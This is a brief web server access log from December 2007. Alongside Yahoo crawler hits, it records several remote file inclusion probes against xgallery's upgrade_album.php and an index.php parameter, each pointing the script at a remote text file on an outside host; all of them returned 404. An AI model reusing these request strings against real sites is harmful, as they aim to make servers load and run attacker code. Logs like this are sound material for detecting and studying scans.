200.37.173.162 - - [29/Dec/2007:16:27:40 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [29/Dec/2007:16:27:45 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.37.173.162 - - [29/Dec/2007:16:27:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sagasufx.com/rulez.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.79 - - [29/Dec/2007:16:28:36 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.52.146.176 - - [29/Dec/2007:16:29:39 -0800] "GET /index.php?p=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.6.26.142 - - [29/Dec/2007:16:33:00 -0800] "GET /retreat1/?N=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
